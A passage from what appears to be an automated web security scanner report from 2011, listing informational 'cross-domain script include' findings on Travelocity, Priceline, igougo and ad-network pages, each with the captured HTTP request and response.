Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1072156.812162.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:09:08 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 603
Date: Mon, 03 Oct 2011 00:09:07 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Sun, 03-Oct-2021 00:09:08 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4359.advertising.comOX2601/B5797640.2;sz=160x600;click=http://r1-ads.ace.advertising.com/click/site=0000812162/mnum=0001072156/cstr=78334226=_4e88fd23,1577287805,812162^1072156^1184^0,1_/xsxdata=$XSXDATA/bnum=78334226/optn=64?trg=;ord=1577287805?">');document.write('<\/SCRIPT>
...[SNIP]...
20.34. http://r1-ads.ace.advertising.com/site=812164/size=728090/u=2/bnum=23819479/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=812164/size=728090/u=2/bnum=23819479/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /site=812164/size=728090/u=2/bnum=23819479/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=529164&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.915323.812164.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:09:08 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 595
Date: Mon, 03 Oct 2011 00:09:08 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Sun, 03-Oct-2021 00:09:08 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3285.advertisingcom/B2343920.49;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000812164/mnum=0000915323/cstr=23819479=_4e88fd24,7015322258,812164^915323^1184^0,1_/xsxdata=$xsxdata/bnum=23819479/optn=64?trg=;ord=7015322258?">');document.write('<\/SCRIPT>
...[SNIP]...
20.35. http://seg.sharethis.com/getSegment.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /getSegment.php?purl=http%3A%2F%2Fwww.igougo.com%2Ftraveldeals%2Fratefinder.aspx%3FTypeID%3D1%26SourceID%3DTVLY-dRF-Popunder%26adlt%3D1%26end%3DBoston%26rm%3D1%26dest%3DBoston%2C%2520undefined%2520undefined%26strtDate%3D10%2F04%2F2011%26endDate%3D10%2F07%2F2011&jsref=http%3A%2F%2Fwww.travelocity.com%2FpopWindow2%3FtheDomain%3Dwww.travelocity.com%26selectedForm%3Dcb-form-ho%26formPrefix%3DHO%26fromDate%3Ddd%26fromMonth%3Dmm%26fromYear%3Dyyyy%26toDate%3Ddd%26toMonth%3Dmm%26toYear%3Dyyyy%26theAdtoShow%3Dad2%26dest%3DBOS%26triptype%3D%26noOfRooms%3D1%26noOfAdults%3D1%26service%3DTRAVELOCITY%26oneway%3D&rnd=1317601643778 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Mon, 03 Oct 2011 00:27:28 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 6174


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
20.36. http://static.igougo.com/scripts/all_53403.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.igougo.com
Path:   /scripts/all_53403.ashx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /scripts/all_53403.ashx?Lo0P=d10051c1dcf48dfca1203fd21cf4182153459 HTTP/1.1
Host: static.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=455|Accelerated|915|12|0; SL_NV12=1|12

Response

HTTP/1.1 200 OK
Server: SLRS
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Tue, 27 Sep 2011 02:07:25 GMT
X-Strangeloop: RCache
Content-Length: 53459
X-SL-RCache: Cached
Cache-Control: public, max-age=31235580
Expires: Fri, 28 Sep 2012 12:59:58 GMT
Date: Mon, 03 Oct 2011 00:26:58 GMT
Connection: close
Vary: Accept-Encoding

SearchAssistant=Class.create({options:$H({className:"suggest",minimumCharacters:3,timeout:10000,delay:40,displayNoResults:!0,noResultsMessage:"No Suggestion",cache:!0,templateField:null,maxItems:10,on
...[SNIP]...
</script>');try{Prototype.Browser.WebKit&&typeof Effect=="undefined"&&document.write('<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8/effects.js"></script>
...[SNIP]...
20.37. http://static.igougo.com/traveldeals/iAuto.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.igougo.com
Path:   /traveldeals/iAuto.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /traveldeals/iAuto.aspx HTTP/1.1
Host: static.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=455|Accelerated|915|12|0; SL_NV12=1|12; __utmx=179047228.; __utmxx=179047228.; __unam=3de0670-132c72d397d-d7082d6-1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
X-Strangeloop: ViewState,Compression
Expires: Mon, 03 Oct 2011 00:27:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:27:06 GMT
Content-Length: 680
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" ><head><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
20.38. http://travel.travelocity.com/hotel/HotelAvailability.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travel.travelocity.com
Path:   /hotel/HotelAvailability.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617 HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelDetail.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?tab=guide&tripType=hotel&propertyId=4810&airport=BOS&resetReview=true&hotelQKey=-2237575859332798600&tsHotelQKey=-2237575859332798600&reviewPage=reviewStart&locLink=HOTEL.HOTELAVAILABILITYLISTLITE1|NAT1&dr=4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=session#1317600481056-80236#1317602524|PC#1317600481056-80236.19#1318810264|check#true#1317600724; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.2.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:13:47 GMT
Server: Apache
Set-Cookie: JSID=C3B4C0033B2F65D5EA7EF7750A5F38F6.p0742; Domain=.travelocity.com; Path=/
Set-Cookie: Service=TRAVELOCITY; Domain=.travelocity.com; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 90909

<!--
JSESSIONID = C3B4C0033B2F65D5EA7EF7750A5F38F6.p0742
TPSESSIONID = null
Service = TRAVELOCITY
TYRG1ST = 51B82D43BB8E25C5
--><script type="text/javascript">var jsessionid="C3B4C0033B2F65D5EA7EF77
...[SNIP]...
<link rel="stylesheet" type="text/css" media="screen,all" href="http://i.travelpn.com.edgesuite.net/11.10/css/HF_hotels_overrides.css"/>
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/navigation.js"></script>
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/global.js"></script>
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/hotels.js"></script>
...[SNIP]...
<link type="text/css" href="http://i.travelpn.com.edgesuite.net/11.10/css/calendar_datepicker.css" rel="stylesheet" />
<script language="javascript" type="text/javascript" src="http://i.travelpn.com.edgesuite.net/jquery/jquery.min.js"></script>
<script language="javascript" type="text/javascript" src="http://i.travelpn.com.edgesuite.net/jquery/ui/jquery.ui.core.js"></script>
<script language="javascript" type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/calendar_datepicker.js"></script>
...[SNIP]...
<body id="hot" onload="javascript:on_load();" >
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/mbox.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/tracking_tags_US.js"></script>
...[SNIP]...
20.39. http://travel.travelocity.com/hotel/HotelCobrand.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travel.travelocity.com
Path:   /hotel/HotelCobrand.do

Issue detail

The response dynamically includes the following script from another domain:

Request

POST /hotel/HotelCobrand.do HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
Content-Length: 735
Cache-Control: max-age=0
Origin: http://www.travelocity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Service=TRAVELOCITY&SEQ=60048504&searchMode=city&expr_path=Y&dateFormat=mm%2Fdd%2Fyyyy&opaqueTabSelected=0&cityCountryCode=US&city=bos&state=&TS_HO_destlist=Las+Vegas%7CNV%7CUS&leavingDate=mm%2Fdd%2Fy
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:46 GMT
Server: Apache
Set-Cookie: JSID=AE7752E570B0CD85432B0A6ABF76028D.p0856; Domain=.travelocity.com; Path=/
Set-Cookie: Service=TRAVELOCITY; Domain=.travelocity.com; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 3616

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!--
JSESSIONID = AE7752E570B0CD85432B0A6ABF76028D.p0856
TPSESSIONID = null
Service = TRAVELOCITY
TYRG1ST = 51B82D43BB8E25C5
--><script
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/swfobject.js"></script>
...[SNIP]...
20.40. http://travel.travelocity.com/hotel/HotelDetail.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travel.travelocity.com
Path:   /hotel/HotelDetail.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /hotel/HotelDetail.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?tab=guide&tripType=hotel&propertyId=4810&airport=BOS&resetReview=true&hotelQKey=-2237575859332798600&tsHotelQKey=-2237575859332798600&reviewPage=reviewStart&locLink=HOTEL.HOTELAVAILABILITYLISTLITE1|NAT1&dr=4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149 HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; IPE_S_TMP_910=910; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=check#true#1317600587|session#1317600481056-80236#1317602387|PC#1317600481056-80236.19#1318810127; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.1.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:34 GMT
Server: Apache
Set-Cookie: JSID=A7716E473BF556C6BB6CA1860CF34A22.p0717; Domain=.travelocity.com; Path=/
Set-Cookie: Service=TRAVELOCITY; Domain=.travelocity.com; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 113893

<!--
JSESSIONID = A7716E473BF556C6BB6CA1860CF34A22.p0717
TPSESSIONID = T0075003076751026003112815903110013629
Service = TRAVELOCITY
TYRG1ST = 51B82D43BB8E25C5
--><script type="text/javascript">var j
...[SNIP]...
<link rel="stylesheet" type="text/css" media="screen,all" href="http://i.travelpn.com.edgesuite.net/11.10/css/HF_hotels_overrides.css"/>
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/navigation.js"></script>
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/global.js"></script>
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/hotels.js"></script>
...[SNIP]...
<link type="text/css" href="http://i.travelpn.com.edgesuite.net/11.10/css/calendar_datepicker.css" rel="stylesheet" />
<script language="javascript" type="text/javascript" src="http://i.travelpn.com.edgesuite.net/jquery/jquery.min.js"></script>
<script language="javascript" type="text/javascript" src="http://i.travelpn.com.edgesuite.net/jquery/ui/jquery.ui.core.js"></script>
<script language="javascript" type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/calendar_datepicker.js"></script>
...[SNIP]...
<body id="hot" class="hotdet" onload="on_load_search();reloadEvents('workspace')" >
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/mbox.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://travelocity.ugc.bazaarvoice.com/static/0025-en_us/bvapi.js"></script>
...[SNIP]...
<!-- ClickToCall enabled -->
<script type='text/javascript' src='//static.atgsvcs.com/js/atgsvcs.js'></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/tracking_tags_US.js"></script>
...[SNIP]...
20.41. http://travela.priceline.com/hotel/newHotelSearch.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/newHotelSearch.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

POST /hotel/newHotelSearch.do?jsk=4663010a5564010a20111003003755e18011569968&plf=PCLN&searchType=CITY&noWait=Y HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Content-Length: 192
Cache-Control: max-age=0
Origin: http://travela.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=4663010a5564010a20111003003755e18011569968&key=gtaqdik9&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FAF2D4913A438B844DA81A6F80DA0319; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; JSessionKey=4663010a5564010a20111003003755e18011569968; Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A37%3A55&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL; PSessKey=; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602422665:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.4.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

cityName=bos&cityID=0&cityID_Name=bos&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&numberOfRooms=1&searchType=CITY&poiName=&addrLine=&poiID=&poiID_Name=&addrCity=&addrState=&addrZIP=

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:01:37 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=8F1936C519E8273F266A95D7A4654200; Path=/hotel
Vary: Accept-Encoding
Content-Type: text/html;;charset=iso-8859-1
Content-Length: 491027


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/17799/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
<!-- ATG_AVAILABLE_A20 -->

<script type="text/javascript" src="//static.atgsvcs.com/js/atgsvcs.js"></script>
...[SNIP]...
20.42. http://travela.priceline.com/hotel/searchResults.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchResults.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=58AA51FFBF9D4E024C54F62C7478894F; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; PSessKey=

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:11:15 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=A33FF447E496BF38ED169D142CD825A3; Path=/hotel
Vary: Accept-Encoding
Content-Type: text/html;;charset=iso-8859-1
Content-Length: 491022


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
</SCRIPT>
